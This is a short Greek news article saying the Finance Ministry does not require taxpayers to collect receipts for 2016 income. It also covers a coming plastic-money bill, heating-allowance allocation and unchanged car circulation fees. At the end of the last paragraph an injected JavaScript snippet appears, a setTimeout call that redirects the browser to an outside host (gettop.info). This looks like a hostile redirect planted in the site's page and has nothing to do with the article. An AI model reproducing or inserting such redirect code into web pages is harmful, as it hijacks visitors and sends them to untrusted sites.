Δεν χρειάζονται οι αποδείξεις για το 2016

0
5

 

Σύμφωνα με διευκρινίσεις από το υπουργείο Οικονομικών, οι φορολογούμενοι δεν υποχρεούνται να συλλέγουν αποδείξεις για τα εισοδήματα του 2016.

Όπως διευκρινίζουν κύκλοι του υπουργείου, το καθεστώς που θα ισχύει για το 2017 θα αποφασισθεί με το νομοσχέδιο για το πλαστικό χρήμα για το οποίο στόχος είναι να οριστικοποιηθεί στις αρχές του επόμενου έτους. Το νομοσχέδιο, όωπς έχει γνωστοποιηθει, θα συνδέει το αφορολόγητο ποσό εισοδήματος με το ύψος των δαπανών του κάθε φορολογουμένου μέσω πλαστικού χρήματος.

Σε ό,τι αφορά το επίδομα θέρμανσης, οι οριστικές αποφάσεις για τον τρόπο κατανομής του θα ληφθούν ως το τέλος του μήνα προκειμένου αυτό να αρχίσει να χορηγείται στους δικαιούχους, ενώ το ΥΠΟΚ εξετάζει το ενδεχόμενο καλύτερης κατανομής του επιδόματος με βάση τις συγκεκριμένες κλιματολογικές συνθήκες της κάθε περιοχής ώστε να χορηγείται σε αυτούς που το έχουν περισσότερο ανάγκη.

Για τα τέλη κυκλοφορίας Ι.Χ. αυτοκινήτων δεν εξετάζονται αλλαγές. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here